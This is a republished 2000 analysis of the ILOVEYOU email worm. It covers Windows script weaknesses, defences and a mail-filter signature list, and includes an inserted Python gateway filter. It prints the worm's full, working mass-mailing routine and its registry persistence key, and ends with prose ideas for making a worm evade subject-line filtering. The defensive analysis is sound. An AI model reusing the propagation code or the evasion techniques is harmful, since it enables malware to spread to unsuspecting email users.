
Somebody Loves You - An Analysis of the ILOVEYOU Worm

posted on June 28, 2000
by hitbsecnews

This article first appeared on 2600 Australia.


Introduction
Hype Hype Hype Hype Hype - the media has gone into a frenzy these last
few days regarding the latest worm to hit the Internet. Damage figures
ranging from a few million dollars up to ten billion dollars have been
thrown up into the air. The author of the worm (thanks to the nice comments
he made in the code) has been tracked down to Manila in the Philippines
and, as of 8/5/2000, police there have arrested a man.
How is it that something as simple as this can cause so much damage and
get the world's attention? Who is at fault? Can this be stopped in the
future?
About
This worm is a simple VBScript (Visual Basic Scripting Edition) program
that modifies system contents and then spawns itself to spread in a number
of ways. The VBScript interpreter/runtime engine (Windows Script Host) comes
installed with Microsoft Windows (even though you might not want it) and is
used to process and execute client-side VBScript files. This means that all
the components required to write, test and spread a worm as destructive as
ILOVEYOU come built-in to Microsoft Windows.
Who is at fault? The fault does not lie in Microsoft Outlook, nor in mIRC
(a popular IRC client) or any of the other pieces of software used to
propagate the worm - the fault is in the native support and the ease of
execution of VBScript on Windows 95/98/NT.
To demonstrate how easy this is, create a new text file and call it test.vbs.
Open it in Notepad and add the following lines:

set test = CreateObject("WScript.Shell")
' the trailing backslash makes RegWrite set the key's (Default) value,
' which is the display name of the Recycle Bin's CLSID
test.RegWrite "HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "/dev/null"

Now save the file, close Notepad, and double-click it to execute. You just
changed the name of your Recycle Bin to "/dev/null" (the classic Unix name
for the bin)... Easy? Yes, but also very scary. Email it to your whole
contact list as an attachment for fun. (The new name appears after the next
restart of Windows; to change it back, just re-run the script with the name
you want in place of "/dev/null".)
If you followed this example, you'll notice that execution of the script
was close to instantaneous, no warning prompts were presented to the user,
and in some cases you might not even have noticed that it worked.
Protection

It's possible to stop these scripts from executing on your system, thus
stopping worms/viruses of this kind from causing damage. The file that
interprets/runs all client-side VBScripts is WSCRIPT.EXE and it can be
renamed or deleted accordingly. On Windows 95/98 it's located in C:\WINDOWS
and in C:\WINNT\SYSTEM32 on Windows NT/2000. Note that the command-line
host, CSCRIPT.EXE, runs exactly the same scripts, so it needs the same
treatment, and the .vbs file association in Explorer can be removed as well.
Although renaming constitutes little more than "security by obscurity",
VBScript is effectively kneecapped.
For some users, VBScript can't be disabled because it's actively used
for workflow automation etc. In such cases, user education about opening
attachments from any source becomes essential. For the rest of us,
the next worm will be little more than another annoying message to delete
rather than a threat to the operation of your computer or your business.
If scripting is your lifeblood, perhaps investigate other client-side
scripting options such as Perl.
In the midst of this, Microsoft needs to come up with a reliable, long-term
solution to the problem of worms/viruses of this nature. How about prompting
users when registry changes are attempted by a script? Were this implemented,
the ILOVEYOU worm would not have been able to add the following registry
value, which makes it run again each time the computer is restarted:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\WINDOWS\SYSTEM\MSKernel32.vbs"

How about protecting those registry keys that are commonly used by worms
and trojans so that they can't be modified without user authorisation?
Double-clicking (or single-clicking with certain versions of Internet
Explorer) on a .vbs file should trigger an "Are you sure you want to execute
this script? It could contain malicious content" warning/prompt. Microsoft
already does something similar for scripts that are included in the body of
an email message, controls/scripts that are embedded into web pages and
macro scripts embedded in Word, Excel and PowerPoint documents, but this
concept has yet to filter through to the "Active Desktop".
Despite all this, the fault isn't solely in VBScript - a worm could also
be in the form of a batch script (.BAT); it just happens that VBScript
is powerful, easy to use and not often recognised by users as something
worthy of attention. There has to be a full layer of security that can
monitor and capture events, then trigger a warning to the user when something
strange is happening. There could be defined actions that are flagged
as "unusual", in which case the user is asked whether they want this to
be done. Such actions might include mass deletion of files,
insertion/modification/deletion of registry keys, a script spawning itself
or other scripts, and other common actions that have been seen in
worms/viruses over the last few years. The fact that most worms/viruses use
similar tactics to infect targeted machines and subsequently spread to other
computers means we at least have some means of stopping rudimentary variants
in future.


We can go further up the chain and block the worm at the server. Many mail
servers (sendmail, for example) and other detection systems allow filtering
of incoming messages. To set up filtering for your respective mail server,
read up in the manual. You might have to install a separate filtering/capture
program depending on your operating system, mail server and setup.
Some basic things we can filter for are, firstly, subject lines of emails
to detect known worms, then known message bodies and attachment names. After
this we can go further by blocking all emails carrying an attachment with a
.vbs extension, or using unique strings from a known worm to block it. So for
the ILOVEYOU worm, some possibilities to scan for could include the strings:
"LOVE-LETTER-FOR-YOU", "scriptini.WriteLine ";Khaled Mardam-Bey"" - or
something more obscure like: "(ext = "wsh") or (ext = "sct") or (ext = "hta") then"
or "replace(code,chr(91)&chr(45)&chr(91),chr(39))". It might also be a good
idea to block any email whose attachment contains VBScript calls that could
mean it's a worm, such as .RegWrite, .GetSpecialFolder and .OpenTextFile,
which are the WScript.Shell and FileSystemObject methods used to write to the
registry, get the system folder name and open a text file for writing,
respectively. Note that the worm's own attachment, "LOVE-LETTER-FOR-YOU.TXT.vbs",
still ends in .vbs: it is the final extension that decides how Windows runs
the file, so a filter must look at that and not stop at the ".TXT".
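To make the filtering rules concrete, here is a small Python mail-gateway filter, added as an example here and not taken from the original article or from any particular mail server. It applies the checks listed above and the script-attachment point from the Protection section: known subject line, known body text, known attachment name, any attachment whose final extension Windows Script Host will execute, the unique worm strings quoted above, and the .RegWrite / .GetSpecialFolder / .OpenTextFile methods. It goes slightly beyond the text by also running a "variant" message with the three hard-coded indicators changed, to show which rules survive that. The sample messages, the sender/recipient addresses and the VBScript fragment inside the attachments are all constructed for this example (the fragment holds only indicator lines, not a working worm); scan_message() is the function a milter or procmail-style hook would call.

```python
"""Mail-gateway filter for ILOVEYOU-style VBScript worms (added example)."""
import email
import re
from email import policy
from email.message import EmailMessage

# Indicators quoted in the article for the ILOVEYOU worm itself.
KNOWN_SUBJECTS = {"ILOVEYOU"}
KNOWN_BODY_FRAGMENTS = ("kindly check the attached LOVELETTER coming from me",)
KNOWN_ATTACHMENT_NAMES = {"LOVE-LETTER-FOR-YOU.TXT.vbs"}
WORM_STRINGS = (
    "LOVE-LETTER-FOR-YOU",
    'scriptini.WriteLine ";Khaled Mardam-Bey"',
    '(ext = "wsh") or (ext = "sct") or (ext = "hta") then',
    "replace(code,chr(91)&chr(45)&chr(91),chr(39))",
)
# Generic rules: extensions Windows Script Host runs on double-click, and the
# WScript.Shell / FileSystemObject methods a worm needs to persist and spread.
SCRIPT_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta"}
SUSPICIOUS_METHODS = (".RegWrite", ".GetSpecialFolder", ".OpenTextFile")


def _squash(s: str) -> str:
    """Lower-case and drop all whitespace so 'ext = "wsh"' also matches 'ext="wsh"'."""
    return re.sub(r"\s+", "", s).lower()


def _final_extension(filename: str) -> str:
    """Windows runs a file by its LAST extension: x.TXT.vbs is a script."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def scan_message(raw: bytes) -> list:
    """Return the reasons to block the message; an empty list means it is clean."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    subject = (msg["Subject"] or "").strip()
    if subject.upper() in KNOWN_SUBJECTS:
        reasons.append(f"known worm subject: {subject!r}")
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    if any(frag.lower() in body.lower() for frag in KNOWN_BODY_FRAGMENTS):
        reasons.append("known worm body text")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name in KNOWN_ATTACHMENT_NAMES:
            reasons.append(f"known worm attachment name: {name}")
        ext = _final_extension(name)
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"script attachment (.{ext}): {name}")
        # Inspect the attachment's content regardless of what it is called.
        text = (part.get_payload(decode=True) or b"").decode("latin-1")
        squashed = _squash(text)
        for sig in WORM_STRINGS:
            if _squash(sig) in squashed:
                reasons.append(f"worm signature string: {sig!r}")
        hits = [m for m in SUSPICIOUS_METHODS if m.lower() in text.lower()]
        if hits:
            reasons.append("suspicious WSH/FSO methods: " + ", ".join(hits))
    return reasons


def is_blocked(raw: bytes) -> bool:
    return bool(scan_message(raw))


# --- constructed sample messages (not real captures) -------------------------
def _build_sample(subject: str, body: str, attachment=None) -> bytes:
    m = EmailMessage()
    m["From"] = "sender@example.invalid"  # placeholder addresses
    m["To"] = "victim@example.invalid"
    m["Subject"] = subject
    m.set_content(body)
    if attachment is not None:
        name, data = attachment
        m.add_attachment(data, maintype="application", subtype="octet-stream",
                         filename=name)
    return m.as_bytes()


# Stand-in for the worm's attachment: indicator lines only, not a working worm.
FAKE_WORM_VBS = rb'''On Error Resume Next
set fso = CreateObject("Scripting.FileSystemObject")
set regedit = CreateObject("WScript.Shell")
set dirsystem = fso.GetSpecialFolder(1)
set c = fso.OpenTextFile(WScript.ScriptFullname, 1)
fso.GetFile(WScript.ScriptFullname).Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs"
if (ext = "wsh") or (ext = "sct") or (ext = "hta") then
scriptini.WriteLine ";Khaled Mardam-Bey"
'''

WORM_MESSAGE = _build_sample(
    "ILOVEYOU", "\nkindly check the attached LOVELETTER coming from me.",
    ("LOVE-LETTER-FOR-YOU.TXT.vbs", FAKE_WORM_VBS))
# Same payload with the three hard-coded indicators changed, as the article warns.
VARIANT_MESSAGE = _build_sample("RE: joke", "see attached", ("photo.jpg.vbs", FAKE_WORM_VBS))
BENIGN_MESSAGE = _build_sample("Returning your call", "Minutes attached.",
                               ("minutes.txt", b"nothing to see"))

if __name__ == "__main__":
    for label, raw in (("worm", WORM_MESSAGE), ("variant", VARIANT_MESSAGE),
                       ("benign", BENIGN_MESSAGE)):
        print(label, "->", "BLOCK" if is_blocked(raw) else "pass", scan_message(raw))
```

Matching of the worm strings strips case and whitespace, so the rule written with spaces (as quoted above) still hits the worm's source, which has none. The variant message is the point of the exercise: with a new subject, body and attachment name it passes the three hard-coded indicators untouched and is caught only by the final-extension rule, the signature strings and the method names, which is why a gateway filter should not stop at the subject line.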
Writing
The basic workings of a worm are: enter, do whatever you want it to do,
then spawn. The worms that we have seen thus far (including the latest
"ILOVEYOU" worm) are all very amateur. The author of the latest worm
shows little programming knowledge in his code; it is very rough and the
underlying methods used in the worm are simple, yet somehow effective.
What would happen if somebody with a bit more skill and malicious intent
were to write something up?
The main characteristic of a worm is the way it spreads itself. Going
back to our Recycle Bin example from above, it would only require an
extra few lines of code for that to become a worm. All that needs to be
added is a method for the worm to spawn itself and spread. The common
methods seen have been mailing itself to the contact list of the user, or
trojaning other programs (such as mIRC). Let's look at how the ILOVEYOU
worm does this.
It is all done in a function called spreadtoemail(), which drives Outlook
through its MAPI namespace. This is one of the final steps in the worm; by
this time it has already caused the damage on the system and is now looking
at ways to spread. The step before this was to create the file
"LOVE-LETTER-FOR-YOU.TXT.vbs" in the system directory, and in spreadtoemail()
this file is attached to the email. I have added comments to this code to
explain the process; this same function could be used in our Recycle Bin
example above to make it behave like a worm.

sub spreadtoemail()
On Error Resume Next ' if there is an error, keep going

dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad ' variables
' (dirsystem is a global the worm set earlier to the Windows system directory)

' define objects to be used in this process

set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")
set mapi = out.GetNameSpace("MAPI")

' for every address list in Outlook do the following process.

for ctrlists = 1 to mapi.AddressLists.Count

' set "a" to the current address list

set a = mapi.AddressLists(ctrlists)
x = 1
' the worm records under HKCU\Software\Microsoft\WAB\ how many entries
' of each list it has already mailed, so it does not resend on the next run
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)

if (regv = "") then
regv = 1
end if

' only proceed with this list if it now holds more entries than were
' recorded last time, i.e. there are addresses not yet mailed

if (int(a.AddressEntries.Count) > int(regv)) then

' for each entry in this list, construct the message then send it

for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
' each address already mailed has its own marker value in the registry
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)

if (regad = "") then

' construct message - simple

set male = out.CreateItem(0)
male.Recipients.Add(malead) ' recipient
male.Subject = "ILOVEYOU" ' subject
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me." ' body
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") ' attach
male.Send ' SEND !
' mark this address as done
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
end if
x = x + 1
next
' record the size of this list as fully processed
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
end if
next

Set out = Nothing
Set mapi = Nothing
end sub

Done. We've just sent an email to every person in our address book(s) with
the file attachment that was produced in the system directory, a subject
line of "ILOVEYOU", and a message body of "kindly check the attached
LOVELETTER coming from me.". One weakness of the worm stands out in this
function: the subject line, message body and attachment name are hard-coded
and so are easily detectable. It needs someone to pick it up later and
change these settings for it to survive (as we have seen with the many
clones of the "ILOVEYOU" worm). What if we were to make the subject line,
message body and attachment name totally dynamic, meaning they are not
always the same and therefore harder to stop? The main method system
administrators, anti-virus companies, the media and Microsoft used to warn
people of this virus was based on the subject line. Millions of people
world-wide were welcomed to work that morning with warnings not to open any
emails with that specific subject line. So of all the lines of code in the
worm, the main protection against it rests on the following three lines:

male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")

I'm about to go into detail on some methods that can be used to make a worm
more effective and dangerous. I could do it here, or I could actually code
the worm and let you find out the hard way. It's just a shame that it takes
destruction to get attention. The first method is to have a large array of
different subject lines, one of which is randomly chosen when the message
is constructed. This would mean that instead of looking for one subject
line, people have to watch for many. Let's say we come up with 100 different
subject lines, one of which is randomly chosen each time the worm passes
itself on. We use trivial and common subject lines such as "RE: joke",
"Offer", "Returning your call", or even go as far as having something as
simple as a blank subject line. Stopping the worm on the basis of its
subject line would no longer be practical. Can we go further in terms of
subject line? Yes. We can go into the Inbox of the client, retrieve all the
email addresses of received emails and their respective subject lines, add
an "RE:" to the beginning of each received subject, and send it back to that
user. In this case we now have a totally dynamic subject line and we are
sending a reply to EVERYBODY who has ever sent us a message, not only our
contact list. With this method, we have changed the "Don't open any emails
with 'ILOVEYOU' in the subject line" warning to "Don't open ANY emails".

From the 2600 Australia issue contents: 5.) Somebody loves you - an analysis of the ILOVEYOU Worm - Black Hand

